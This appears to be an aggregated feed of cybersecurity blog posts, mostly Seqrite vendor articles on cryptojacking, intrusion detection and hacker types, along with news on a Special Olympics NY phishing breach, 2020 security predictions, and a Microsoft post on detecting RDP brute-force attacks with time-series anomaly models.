Defending businesses from the perils of Cryptojacking

Estimated reading time: 2 minutes

The last few years have given rise to a new & dangerous cyberthreat known as cryptojacking which is unlike typical malware — it does not demand ransom, spy or cripple enterprise systems or cause loss of data. We introduced the subject earlier and are re-iterating on the same with few additional pointers.

Enterprises should take this threat very seriously!

Increase in Cryptojacking attacks

In 2018, an Economic Times report observed that hackers were mining a fortune by running cryptocurrency scripts on Indian government websites, including the director of municipal administration of Andhra Pradesh, Tirupati Municipal Corporation and Macherla municipality. Seqrite’s Threat Report Q2 2019 also detected 19k cryptojacking attacks as against 17K in Q1, 2019 illustrating how this threat is seeing a rapid upsurge.

Since we already shared insights on the functionality of cryptojacking, here is some information on why cryptojacking is getting popular among the hacker community.

Why is Cryptojacking popular?

Less risk! Hackers love Cryptojacking because it is way less risky than planting ransomware in enterprise systems. In businesses worldwide, awareness of ransomware has grown. Hence, stakeholders are applying better and advanced solutions to protect against the same. This is not the same with Cryptojacking as this technique of infecting business machines is new.

While hackers can convince, say 4-5 businesses to pay, out of a 100 that they attack via ransomware, in cryptojacking they can ensure that all 100 machines that they attack work at full capacity to mine for cryptocurrency. This hacking technique is also very simple and does not require high technical skills. Cryptojacking kits can be easily picked up from the dark web for as less as $30.

For enterprises, cryptojacking attacks can lead to server outages and high costs of consumption. To prevent these attacks, they need to take the below-mentioned measures –

Ensure endpoint protection can detect these threats

As a threat which is on the rise, it is important for enterprises to update the endpoint protection solution they are using so they are able to detect and block cryptojacking threats. While like all other cyber threats, where the methods may constantly change, an updated security solution, such as Seqrite’s Endpoint Security, can detect and prevent cryptojacking attacks from happening.

Browser protection is key

Cryptojacking spreads by getting users to click on malicious links on websites which lead to the miner being installed on a system. The way to prevent this from happening is ensuring that browsers in the enterprise have strong protection installed which can prevent these scripts from running.

Use web filtering to block suspicious websites

Along with browser protection, it can be a good idea for enterprises to go one step further and use their web filtering solutions to block websites suspected of malicious activities such as cryptojacking from being accessed.

A strong MDM solution is important

Mobile Device Management (MDM) solutions like the Seqrite mSuite can prevent mobile devices from being infected by cryptojacking software offering cybersecurity for businesses that are also on-the-go.

Seqrite’s Unified Threat Management (UTM) solution offers ease of use and brings key security features such as network security, management, backup and recovery of data and other critical network services together under a single unified umbrella, preventing cryptojacking attacks at the source.

The post Defending businesses from the perils of Cryptojacking appeared first on Seqrite Blog.

Special Olympics New York Hacked to Send Phishing Emails

New York Special Olympics has been compromised, a non-profit organization focusing on competitive athletes with mental handicaps.

New York Special Olympics presents equal opportunity to participate in Competitive, organized sports for people with intellectual disabilities.

Sadly, during the Christmas holiday, the non-profit agency was compromised and the perpetrators then used their email server to initiate a phishing operation against their donors.

“Friends, Boo! As you may have noticed, our email server was temporarily hacked. We have fixed the problem and send our sincerest apologies. While donating to Special Olympics NY is always a good idea, we would never ask in such a grinchy way.” wrote Stacey Hengsterman, President & CEO of Special Olympics NY, in a post published on Instagram.

“We immediately heard from so many of you and for that we are grateful.
We are sorry for the inconvenience and hope you are all enjoying your holiday season!”

The company reported the intrusion and confirmed that the perpetrators had been shut out, it also sent a notice of data breach to the affected people, requesting that they ignore the organization’s last post.

NY Casey Vattimo, SVP of Public Affairs for Special Olympics, revealed the breach on Twitter and reported the stabilization of the case.

Hack

New York Special Olympics claimed that interference only compromised the “communications system” including the contact information of supporters, as well as pointing out that no financial data is revealed.

The phishing messages sent to donors informed them of an upcoming contribution fee that would immediately deduct $1,942.49 from the goal account in two hours.

Using this technique attackers fooled the victims into clicking on one of the two embedded hyperlinks that led them to the transaction statement’s PDF version.

“Please review and confirm that all is correct, if you have any questions, please find my office ext number in the statement and call me back,” read the content of the phishing emails. “It is not a mistake, i verified all twice. Thank you, have a great weekend.”

A Constant Contact monitoring Link was used by the phishing email to guide users to a website designed to steal credit card details from donors.

Casey Vattimo noted that consumers can now make donations without any complications, noting that all sums raised by December 31 to Special Olympics NY will be multiplied by Finish Line’s courtesy.

The post Special Olympics New York Hacked to Send Phishing Emails appeared first on .

Managing cybersecurity in multimedia networks

Estimated reading time: 2 minutes

The explosion of internet speeds across the globe has led to a rapid increase in high-end streaming technology, wireless sensor networks and wearable Internet of Things (IoT) devices. Multimedia networks generate huge amounts of data flowing through multiple devices in different locations while also raising important questions about data propriety, copyright and protection. Cybersecurity has become an important component of multimedia networks looking to tackle these issues.

The urgency is precipitated by the condition of organizations which operate in this sector. A survey of cybersecurity decision-makers at US media and entertainment firms by Forrester Consulting in September 2018 found that more than half of the surveyed firms had experienced three or more cyber attacks. In April 2015, a cyberattack on renowned French international TV broadcaster TV5 Monde took 12 channels belonging to the broadcaster off the air.

Considering multimedia networks deal with the dissemination of large amounts of content in video, audio, image and other formats, these networks are open to various types of threats which target three major features of these networks:

Confidentiality

Confidentiality is an important feature of data in multimedia networks. Access to confidential data through illegal means or unauthorized channels constitutes a major threat.

Integrity

The integrity of the data contained in multimedia networks is paramount. Alteration of this data through detected or undetected means represents a major breach.

Availability

The end-users of multimedia networks expect the data they seek to be available at all times. Any disruption to this service has both a reputational and a financial consequence.

The exact kinds of threats that multimedia networks face are varied but they definitely include:

Distributed Denial of Service (DDoS) attacks

Multimedia networks are large & distributed and transmit huge amounts of data. Attackers specifically target such networks with Distributed Denial of Service (DDoS) attacks as the repercussions are immediate.

Patching vulnerabilities

Multimedia networks consist of many devices distributed mainly over different continents and countries. Such a large network means it is not always possible to ensure all devices are compliant with the recent security updates, opening up the network to vulnerabilities.

Supply chain attacks

As alluded to in the last point, the multimedia network generally has large supply chains which may not always uphold the same standards of cybersecurity. Any malware in the supply chain may spread to the main network leading to the network finding itself at risk.

Social engineering

Though awareness has increased, multimedia networks often find themselves operated by employees who do not take cybersecurity as seriously or do not understand the consequences of neglecting cybersecurity. Such employees are at high risk of social engineering attacks.

To protect against these threats, enterprises running multimedia networks can consider Seqrite’s Unified Threat Management (UTM) solution which is a complete security package of vital tools, including a UTM firewall and high-grade intrusion detection systems.

Key UTM features which keep networks safe from threats:

  • Firewall – Administrators can block traffic between internal and external networks based on compliance policies
  • Intrusion Prevention System (IPS) – Network traffic is scrutinized in real-time to forestall a broad range of DoS and DDoS attacks
  • Gateway Antivirus – Incoming and outgoing network traffic is scanned at the gateway level
  • Web Filtering – Non-business related web traffic can be blocked by administrators with the option of group-based bandwidth management

The post Managing cybersecurity in multimedia networks appeared first on Seqrite Blog.

How can blockchain enable better data security for enterprises?

Estimated reading time: 2 minutes

NASA recently announced a proposal to explore the possibility of using blockchain to improve the cybersecurity of its current air traffic management systems. It was a powerful statement from one of the world’s most well-known organizations and a strong endorsement of blockchain which has the potential to change how business is conducted, worldwide.

To understand its power, it is important to understand what blockchain actually is — it is a type of ledger containing records arranged in data blocks that use cryptographic validation to link together. Blockchain is a database with built-in validation where all transactions are recorded and confirmed anonymously.

Decentralization for greater security

A key differentiating point about blockchain is that it is distributed and exists on multiple systems at the same time. Importantly, the information entered cannot be altered. Each user needs a private, cryptographically created key to access only the blocks they own. In this way, the ledger cannot be manipulated as no one can edit a blockchain without having the corresponding keys.

It is this decentralization that could revolutionize cybersecurity. The principle of blockchain technology is that there is no centralized authority or storage location – in conventional information systems, attackers can target this kind of a lower system to inflict maximum damage. This means each transaction is verified against the entire network with each transaction required to be verified cryptographically. This ultimately means that an entire database is not at risk in the event of a major vulnerability, mainly because it is distributed on different nodes unlike a conventional setup.

Benefits of blockchain technology

While research into blockchain continues, more and more companies are exploring how blockchain could benefit their enterprise security. Two key ways are:

A Lower percentage of DDoS attacks

Distributed denial of service (DDoS) attacks occur when an attacker launches multiple, continuous attacks on a server, ultimately compelling it to get overwhelmed and collapse. However, the very decentralization which is at the heart of blockchain technology could enable a lower percentage of DDoS attacks on enterprises. The information would be distributed along a large number of nodes ensuring there is no single point of vulnerability.

Better data protection

Enterprises have to be much more careful about the way they handle customer data considering the new wave of data protection laws across the world. Blockchain technology could ensure better protection of data, thanks to its inbuilt protection mechanisms. Data is cryptographically secured with unique keys and distributed across multiple devices.  Each node has a copy of the entire blockchain which is synchronized with a new update with details also recorded. Hence, any attempt at trying to delete data or put false data can be immediately detected.

With many companies exploring the power of blockchain for cybersecurity and other functions, it is quite clear that the technology has a long future. Enterprises must continue to explore ways in which they can unlock the power of blockchain to enable greater cybersecurity.

The post How can blockchain enable better data security for enterprises? appeared first on Seqrite Blog.

Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020

2019 is virtually over and a new year beckons with all the solemnity of the grim reaper for those who don’t have their eyes wide open to the persistent threats we collectively face in the areas of privacy and cybersecurity. 

Now that I have your attention, I’d like to add that it’s not all bad news. In the main, consumers and business leaders alike are more aware of cybersecurity and privacy than ever before. However, this sea change has been met with innovation on the criminal side of things. As defenses improve, the attack vectors become more nuanced and technically impressive. At times it can seem like a war of attrition, which brings us to the first series of predictions for 2020:

  1. CISOs will get worse at their jobs. Okay, simmer down all you cybersecurity people. I just mean there will be a shortage of experts–i.e., fewer of you to go around because at this moment in history everyone understands that a good CISO is critical to the ongoing success of an enterprise (the 2019 IBM Cost of Data Breach study found that the average cost to an organization was $3.92 million). With the demand for cybersecurity professionals far exceeding supply, the market will start having openings for less qualified people. Water finds its level, but it will be rough for a while. 
  2. The disinformation blob will grow. With what we experienced in 2016 and 2018, is there any doubt there will be a rise in disinformation–homegrown and imported–of all stripe in the upcoming elections? Since these weaponized misinformation campaigns have proven effective, expect to see more of them in the private sector, with businesses adopting troll farm tricks to hurt the competition–or rather waiting to be discovered by intrepid reporters like Brian Krebs.
  3. Ransomware will continue to thrive. As long as humans are well……human, phishing attacks will lead to ransomware infecting more and more networks, and businesses, municipalities and other organizations will continue to pay whatever they must in order to regain control of their data and systems. We will also see better backup practices that will help minimize or neutralize the threat of these attacks. 
  4. IoT botnets will make dystopian paranoia seem normal. IoT will continue to grow exponentially. In 2020 there will be somewhere around 20 billion IoT devices in use around the world. Unfortunately, many are not secure because they are protected by nothing more than manufacturer default passwords readily available online. They will weaponized (like years past) but with increasing skill and computing power. 
  5. The integrity of the US elections will be questioned–and for good reason. There are still voting machines in use that are far from secure, and would not pass the most simple audits. Some states continue to use machines that leave no paper trail. Look forward to questions regarding election security all year. 
  6. Cryptocurrency miners will continue to get rich off of stolen electricity. Related to the botnet craze, we will see an increase in computing power theft used to mine cryptocurrency. With bots becoming exponentially more effective as the result of AI and cloud computing, we will see a renaissance of Wild West behavior in the world’s cryptomines.  
  7. Zero trust environments will be talked about. A few may exist. The assumption that one can trust the home team–people within one’s organization–sort of went the way of the Dodo bird when Edward Snowden walked away from the NSA carrying a treasure trove of NSA data hidden in a Rubic’s Cube. Zero trust simply means that no one can be trusted, in or outside the organization. With this assumption foremost, new systems make breaches and compromises harder to happen. Stay tuned.
  8. More people will know what “protect surface” means. Protect surface is part of the zero-trust environment. An organization’s attackable surface includes every error-prone human in its employ as well as the mistakes in configuration they may have committed along the way and a whole constellation of other issues. The protect surface is much smaller and must be kept out of harm’s way. The more we talk about subjects like protect surface, the stronger our cybersecurity will be.
  9. Cars will be frozen. Or not. But actually, yes. I think it will happen. Driverless cars are going to hit things as well as get hit. Cars that talk to satellites are toast. It’s going to happen. (Or not. But it totally could.)
  10. 5G will make the cyber smash grab a thing.  5G is going to make everything move fast, as will the new generation USB4 devices . With quicker speed, it will take much less time to transfer data. Coincidentally, criminals appreciate this as much as the rest of us. 
  11. Social media will no longer need to be private. Social media companies will probably become a bit more responsible when it comes to the way they gather, store, crunch, analyze and sell our data to marketing companies and small to medium sized businesses looking to connect directly with consumers. This is really not worth talking about, however, because all of our information has already been scooped up. It’s good news for 2020 babies. 
  12. State-sponsored traffic jams will be a thing. The hackers who brought you Hillary’s emails and who probably have President Trump’s tax returns are going to target operational systems with an array of tactics that include ransomware and more DDoS attacks that will snarl things up in ways we’ve not yet seen. The targets will be financial institutions, the power grid, an election, a company’s secret sauce, a city’s traffic lights or, you can fill in the blank.
  13. You’re going to have personal cyber insurance. Insurance companies will be writing more comprehensive cyber liability policies for businesses and offering innovative personal cyber coverage for consumers.
  14. HR will save money by spending some. More employers will offer their employees identity protection products and services as part of their paid or voluntary benefits programs. (An employee who has their identity stolen is not very productive and if, as part of that identity theft, their USER ID or passwords are exposed, a thief might have what he or she needs to access an employer’s network and sensitive databases.)
  15. The cloud will leak. The parade of stories about misconfigured cloud clients and data stored without any password protection on cloud services will continue apace, perhaps in part because of the CISO issue discussed in the first prediction. 
  16. AI will gladly take your job. The Yang Gang knows it’s true. AI is here and it’s willing to work so that you can go fishing, collect that monthly $1,000 and not make ends meet. In all seriousness, the CISO shortage as well as many of the innovations discussed in this list of predictions will be increasingly powered by Artificial Intelligence. 

2020 promises to be an interesting ride. Buckle up, because that driverless car might be hacked along the way. As ever, you are your best guardian when it comes to your privacy and personal cybersecurity. Be smart. Stay safe. And, have a very happy, healthy holiday season. 

 

 

The post Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020 appeared first on Adam Levin.

Black Hat Hackers & White Hat Hackers – The Sequel

Estimated reading time: 2 minutes

Thanks to popular culture, the image of a hacker has often become stereotypical, which is ‘criminals using advanced cyber techniques to infiltrate enterprises or systems, with the intention to cause mayhem.’ It’s an image carefully cultivated by movies and books to the extent that many people may not be aware that there is actually more to the popular stereotype.

At its most basic, hacking is referred to as the bypassing of security measures to enter a computer device or network. The individuals who do this are called hackers —  however, all hackers are not cybercriminals.

Sometimes, organizations may even reward hackers to infiltrate their systems.

Surprised? Read on as we add on to our previous blog on the same topic.

The White Hat hacker

The white-hat hacker is a form of an external audit used and even favoured by many organizations. Thanks to their specialized knowledge of breaking into systems, white hat hackers could well be intricately aware of the flaws present inside an enterprise’s cybersecurity posture, perhaps more so than even the security teams. Since white hat hackers do what they do for a living, they can spot vulnerabilities and loopholes in systems which may not be visible within the organization.

White hat hackers are employed by many different organizations across the world to test their security defences. Seqrite offers Red Team Assessments as a service, which are mock trials of how well an enterprise’s people, processes and technology hold up to cyberattacks which are conducted by highly trained security professionals who attempt to breach an organization. Red Team Assessments were recently recommended by the Reserve Bank of India (RBI), India’s central banking institution,  who endorsed the use of such kind of assessments for financial institutions.

The major difference between white hat and black hat hackers are that the former enters an organization’s system with its full consent and knowledge. White hat hackers are not motivated by malice but with a genuine desire to help enterprises iron out its cybersecurity flaws.

The Black Hat hacker

The black hat hacker is the cybercriminal that enterprises worry about — like white hat hackers, they are professionals with an in-depth knowledge of how to identify loopholes in an organization’s cybersecurity framework and use these to penetrate & attack. Unlike white hat hackers, they aren’t motivated by any good intentions but by malice.

Black hat hackers are cybercriminals because they have malicious motives to attack businesses. The motives can vary from stealing confidential data and selling it on the black web or even just to create chaos within an organization. In many cases, even script kiddies who may not be experienced, try and use software to conduct hacking attacks or run Distributed Denial of Service (DDoS) attacks to bring an organization to its knees.

However, enterprises know that the key to dealing with black hat hackers is to maintain a powerful security solution which can plug gaps in vulnerabilities and call out suspicious user behaviour when it happens. Seqrite offers a range of security solutions for an enterprise assuring powerful protection against hackers and other threats. Whether it is endpoint security or providing an integrated threat management solution for the network, enterprises can depend on Seqrite for their cybersecurity protection.

The post Black Hat Hackers & White Hat Hackers – The Sequel appeared first on Seqrite Blog.

The Best Templates for Posting Cybersecurity Jobs

The cybersecurity of a company is heavily reliant upon the skills and knowledge of the people who install, manage, and operate its security products. This means that recruiting and nurturing the best security team possible should be a CISO's top priority. Cynet's Ultimate Cybersecurity Job Posting Templates (download here) provide a list of the main responsibilities and skills for typical

How do Intrusion Detection/Prevention Systems work?

Estimated reading time: 3 minutes

Enterprises mainly use two types of systems to deal with network intrusions – Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). While the two systems are primarily similar, it is important to understand the major aspects which distinguish them.

Intrusion Detection Systems (IDS) operate through a process where events on the network are monitored and analyzed to detect possible incidents of trespassing or violation of security markers. This is mainly a reactive process where all incoming and outgoing network activity is monitored and any signs of intrusion in the systems that could jeopardize the business are flagged. Its main function is to raise an alert when it discovers any such activity and hence it is commonly known as a passive monitoring system.

IDS uses the following techniques to detect attacks –

Signature-Based Detection

Through this method, IDS detects an attack with a pattern or signature that corresponds to a known type of attack — signatures are compared to past observed events to identify a possible attack. For example, an IPS system would flag an email with a subject line like ‘Free pics’ as it is a known signature of malware. This kind of detection is effective for detecting attacks that are logged in the system.

Anomaly-Based Detection

In the Anomaly-Based Detection method, IDS matches network activity against a normal profile of activity. When network activity is observed that is anomalous to this normal profile, the system can flag it. For example, IDS will detect an incident when it observes large amounts of data, flow on a network which is considerably higher than the normal pattern. However, in this type of method, the profile must be continuously updated as false positives may occur.

Intrusion Prevention Systems (IPS) are a step forward from IDS in terms of capabilities. Where IDS is a reactionary mechanism, IPS is proactive and attempts to go one step ahead of detection, actively seeking to prevent the detected threat from succeeding. It is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or a system.

IPS technologies attempt to stop a detected attack from succeeding through some of the below actions:

Terminating network connection

The IPS can attempt to stop a detected attack within the network by terminating the connection being used for the attack and access being blocked to the target from the offending account.

Automating security controls

On detection of an attack or vulnerabilities within a host, an IPS can attempt to prevent damage by applying some preset automated security controls by downloading of patches or reconfiguring the settings of a firewall.

Attempt to make the attack benign

An IPS can attempt to tackle an attack by trying to make it benign, like removing a malicious attachment from a mail.

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

The post How do Intrusion Detection/Prevention Systems work? appeared first on Seqrite Blog.

70% of Organizations Experienced Internal Data Breaches in the Last Five Years

Internal data breaches are on the rise, with 70% of security professionals reporting that it’s happened to them in the last five years.

According to a survey conducted by email security company Egress, accidental internal breaches are one of the top three concerns for IT security decision makers along with external hacks and malware.

Among the other findings in the report, fewer than than 40% (39.6%) of organizations train best cybersecurity practices and data hygiene to employees, and 26% of respondents did not use encryption when transmitting data externally. 

While e-mail applications are a leading cause of accidental breaches, file sharing services, collaboration tools, and SMS apps represent significant risks.

Respondents did indicate a new urgency with regard to compliance with privacy- and security-centric regulations such aspol the European Union’s General Data Protection Regulation and California’s pending California Consumer Privacy Act.

The post 70% of Organizations Experienced Internal Data Breaches in the Last Five Years appeared first on Adam Levin.

What are the different techniques of intruding networks?

Estimated reading time: 2 minutes

Network performance is the key indicator of an enterprise’s productivity and health in these connected times. It is the prerequisite of every business enterprise to maintain a smooth network workflow; however, that is easier said than done. Enterprise networks are susceptible to unauthorized activities in the form of targeted intrusions through vulnerabilities and backdoors.

When such vulnerabilities are exploited, unsolicited access to the network occurs which can have a range of unpleasant consequences for businesses. These intrusions can have harmful effects on business health such as high utilization of resources to loss of enterprise data.

Cybersecurity teams deployed by enterprises are required to proactively detect and respond to network intrusions. It is imperative that these teams have a detailed understanding of how network intrusions and other types of attacks occur so that detection and prevention systems can be set up with the same in mind.

This understanding begins with identifying the type of attack vector. Network intrusions happen through a variety of techniques some of which are –

Asymmetric Routing

In this type of method, intrusions happen via various routes to the target device. To avoid detection, the intrusive packets bypass sensors to reach their target.

Taking advantage of vulnerabilities in networks

In many cases, networks are infiltrated through existing software with attackers either taking advantage of vulnerabilities or using stolen credentials. Since most enterprises use operating systems or other software, attacks can use these vectors for infiltration.

Common Gateway Interface (CGI) scripts

Infiltrators can use the Common Gateway Interface (CGI) scripts to secure network files. CGI scripts are used in networks to support connections between servers and clients on the Web but attackers can manipulate scripts without input verification to access files not meant for the Web.

Protocol Specific Attacks

Devices using common network protocols like TCP, ARP, IP, UDP, ICMP etc. can leave backdoors open for intrusions, e.g. man-in-the-middle attacks

Network intrusions can commonly be covered up by their controllers to ensure that enterprises are unable to detect them. Attackers use various techniques such as deleting access logs, encrypting stolen data or installing rootkits to ensure cybersecurity teams are unable to detect their activities.

The most effective way for enterprises to prevent and act against network intrusions is to employ an Intrusion Prevention/Detection System. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in systems that could jeopardize the business. An Intrusion Prevention System (IPS) is a step ahead of IDS with its capabilities. The system detects and blocks anomalies on a company’s network. An IPS is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or system

Benefits of Seqrite’s UTM solution

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into enterprise networks and forestalls a broad range of DoS and DDoS attacks before they penetrate the network.

The post What are the different techniques of intruding networks? appeared first on Seqrite Blog.

Google Offers Financial Support to Open Source Projects for Cybersecurity

Besides rewarding ethical hackers from its pocket for responsibly reporting vulnerabilities in third-party open-source projects, Google today announced financial support for open source developers to help them arrange additional resources, prioritizing the security of their products. The initiative, called "Patch Rewards Program," was launched nearly 6 years ago, under which Google rewards

Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks

Computers with Windows Remote Desktop Protocol (RDP) exposed to the internet are an attractive target for adversaries because they present a simple and effective way to gain access to a network. Brute forcing RDP, a secure network communications protocol that provides remote access over port 3389, does not require a high level of expertise or the use of exploits; attackers can utilize many off-the-shelf tools to scan the internet for potential victims and leverage similar such tools for conducting the brute force attack.

Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections. Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.

In a brute force attack, adversaries attempt to sign in to an account by effectively using one or more trial-and-error methods. Many failed sign-ins occurring over very short time frequencies, typically minutes or even seconds, are usually associated with these attacks. A brute force attack might also involve adversaries attempting to access one or more accounts using valid usernames that were obtained from credential theft or using common usernames like “administrator”. The same holds for password combinations. In detecting RDP brute force attacks, we focus on the source IP address and username, as password data is not available.

In the Windows operating system, whenever an attempted sign-in fails for a local machine, Event Tracing for Windows (ETW) registers Event ID 4625 with the associated username. Meanwhile, source IP addresses connected to RDP can be accessed; this information is very useful in assessing if a machine is under brute force attack. Using this information in combination with Event ID 4624 for non-server Windows machines can shed light on which sign-in sessions were successfully created and can further help in detecting if a local machine has been compromised.

In this blog we’ll present a study and a detection logic that uses these signals. This data science-driven approach to detecting RDP brute force attacks has proven valuable in detecting human adversary activity through Microsoft Threat Experts, the managed threat hunting service in Microsoft Defender Advanced Threat Protection. This work is an example of how the close collaboration between data scientists and threat hunters results in protection for customers against real-world threats.

Insights into brute force attacks

Observing a sudden, relatively large count of Event ID 4625 associated with RDP network connections might be rare, but it does not necessarily imply that a machine is under attack. For example, a script that performs the following actions would look suspicious looking at a time series of counts of failed sign-in but is most likely not malicious:

  • uses an expired password
  • retries sign-in attempts every N-minutes with different usernames
  • over a public IP address within a range owned by the enterprise

In contrast, behavior that includes the following is indicative of an attack:

  • extreme counts of failed sign-ins from many unknown usernames
  • never previously successfully authenticated
  • from multiple RDP connections
  • from new source IP addresses

Understanding the context of failed sign-ins and inbound connections is key to discriminating between true positive (TP) and false positive (FP) brute force attacks, especially if the goal is to automatically raise only high-precision alerts to the appropriate recipients, as we do in Microsoft Defender ATP.

We analyzed several months’ worth of data to mine insights into the types of RDP brute force attacks occurring across Microsoft Defender ATP customers. Out of about 45,000 machines that had both RDP public IP connections and at least 1 network failed sign-in, we discovered that, on average, several hundred machines per day had high probability of undergoing one or more RDP brute force attack attempts. Of the subpopulation of machines with detected brute force attacks, the attacks lasted 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more.

Figure 1: Empirical distribution in number of days per machine where we observed 1 or more brute force attacks

As discussed in numerous other studies [1], large counts of failed sign-ins are often associated with brute force attacks. Looking at the count of daily failed sign-ins, 90% of cases exceeded 10 attempts, with a median larger than 60. In addition, these unusual daily counts had high positive correlation with extreme counts in shorter time windows (see Figure 2). In fact, the number of extreme failed sign-ins per day typically occurred under 2 hours, with about 40% failing in under 30 minutes.

Figure 2: Count of daily and maximum hourly network failed sign-ins for a local machine under brute force attack

While a detection logic based on thresholding the count of failed sign-ins during daily or finer grain time window can detect many brute force attacks, this will likely produce too many false positives. Worse, relying on just this will yield false negatives, missing successful enterprise compromises: our analysis revealed several instances where brute force attacks generated less than 5-10 failed attempts at a daily granularity but often persisted for many days, thereby avoiding extreme counts at any point in time. For such a brute force attack, thresholding the cumulative number of failed sign-ins across time could be more useful, as depicted in Figure 3.

Figure 3: Daily and cumulative failed network sign-in

Looking at counts of network failed sign-ins provides a useful but incomplete picture of RDP brute force attacks. This can be further augmented with additional information on the failed sign-in, such as the failure reason, time of day, and day of week, as well as the username itself. An especially strong signal is the source IP of the inbound RDP connection. Knowing if the external IP has a high reputation of abuse, as can be looked up on sites like https://www.abuseipdb.com/, can directly confirm if an IP is a part of an active brute force.

Unfortunately, not all IP addresses have a history of abuse; in addition, it can be expensive to retrieve information about many external IP addresses on demand. Maintaining a list of suspicious IPs is an option, but relying on this can result in false negatives as, inevitably, new IPs continually occur, particularly with the adoption of cloud computing and ease of spinning up virtual machines. A generic signal that can augment failed sign-in and user information is counting distinct RDP connections from external IP addresses. Again, extreme values occurring at a given time or cumulated over time can be an indicator of attack.

Figure 4 shows histograms (i.e., counts put into discrete bins) of daily counts of RDP public connections per machine that occurred for an example enterprise with known brute force attacks. It’s evident that normal machines have a lower probability of larger counts compared to machines attacked.

Figure 4: Histograms of daily count of RDP inbound across machines for an example enterprise

Given that some enterprises have machines under brute force attack daily, the priority may be to focus on machines that have been compromised, defined by a first successful sign-in following failed attempts from suspicious source IP addresses or unusual usernames. In Windows logs, Event ID 4624 can be leveraged to measure successful sign-in events for local machine in combination with failed sign-ins (Event ID 4625).

Out of the hundreds of machines with RDP brute force attacks detected in our analysis, we found that about .08% were compromised. Furthermore, across all enterprises analyzed over several months, on average about 1 machine was detected with high probability of being compromised resulting from an RDP brute force attack every 3-4 days. Figure 5 shows a bubble chart of the average abuse score of external IPs associated with RDP brute force attacks that successfully compromised machines. The size of the bubbles is determined by the count of distinct machines across the enterprises analyzed having a network connection from each IP. While there is diversity in the origin of the source IPs, Netherlands, Russia, and the United Kingdom have a larger concentration of inbound RDP connections from high-abuse IP.

Figure 5: Bubble chart of IP abuse score versus counts of machine with inbound RDP

A key takeaway from our analysis is that successful brute force attempts are not uncommon; therefore, it’s critical to monitor at least the suspicious connections and unusual failed sign-ins that result in authenticated sign-in events. In the following sections we describe a methodology to do this. This methodology was leveraged by Microsoft Threat Experts to augment threat hunting and resulted in new targeted attack notifications.

Combining many relevant signals

As discussed earlier (with the example of scripts connecting via RDP using outdated passwords yielding failed sign-ins), simply relying on thresholding failed attempts per machine for detecting brute force attacks can be noisy and may result in many false positives. A better strategy is to utilize many contextually relevant signals, such as:

  • the timing, type, and count of failed sign-in
  • username history
  • type and frequency of network connections
  • first-time username from a new source machine with a successful sign-in

This can be even further extended to include indicators of attack associated with brute force, such as port scanning.

Combining multiple signals along the attack chain has been proposed and shown promising results [2]. We considered the following signals in detecting RDP inbound brute force attacks per machine:

  • hour of day and day of week of failed sign-in and RDP connections
  • timing of successful sign-in following failed attempts
  • Event ID 4625 login type (filtered to network and remote interactive)
  • Event ID 4625 failure reason (filtered to %%2308, %%2312, %%2313)
  • cumulative count of distinct username that failed to sign in without success
  • count (and cumulative count) of failed sign-ins
  • count (and cumulative count) of RDP inbound external IP
  • count of other machines having RDP inbound connections from one or more of the same IP

Unsupervised probabilistic time series anomaly detection

For many cybersecurity problems, including detecting brute force attacks, previously labeled data is not usually available. Thus, training a supervised learning model is not feasible. This is where unsupervised learning is helpful, enabling one to discover and quantify unknown behaviors when examples are too sparse. Given that several of the signals we consider for modeling RDP brute force attacks are inherently dependent on values observed over time (for example, daily counts of failed sign-ins and counts of inbound connections), time series models are particularly beneficial. Specifically, time series anomaly detection naturally provides a logical framework to quantify uncertainty in modeling temporal changes in data and produce probabilities that then can be ranked and thresholded to control a desirable false positive rate.

Time series anomaly detection captures the temporal dynamics of signals and accurately quantifies the probability of observing values at any point in time under normal operating conditions. More formally, if we introduce the notation Y(t) to denote the signals taking on values at time t, then we build a model to compute reliable estimates of the probability of Y(t) exceeding observed values given all known and relevant information, represented by P[y(t)], sometimes called an anomaly score. Given a false positive tolerance rate r (e.g., .1% or 1 out of 10,000 per time), for each time t, values y*(t) satisfying P[y*(t)] < r would be detected as anomalous. Assuming the right signals reflecting the relevant behaviors of the type of attacks are chosen, then the idea is simple: the lowest anomaly scores occurring per time will be likely associated with the highest likelihood of real threats.

For example, looking back at Figure 2, the time series of daily count of failed sign-ins occurring on the brute force attack day 8/4/2019 had extreme values that would be associated with an empirical probability of about .03% out of all machine and days with at least 1 failed network sign-in for the enterprise.

As discussed earlier, applying anomaly detection to 1 or a few signals to detect real attacks can yield too many false positives. To mitigate this, we combined anomaly scores across eight signals we selected to model RDP brute force attack patterns. The details of our solution are included in the Appendix, but in summary, our methodology involves:

  • updating statistical discrete time series models sequentially for each signal, capturing time of day, day of week, and both point and cumulative effects
  • combining anomaly scores using an approach that yields accurate probability estimates, and
  • ranking the top N anomalies per day to control a desired number of false positives

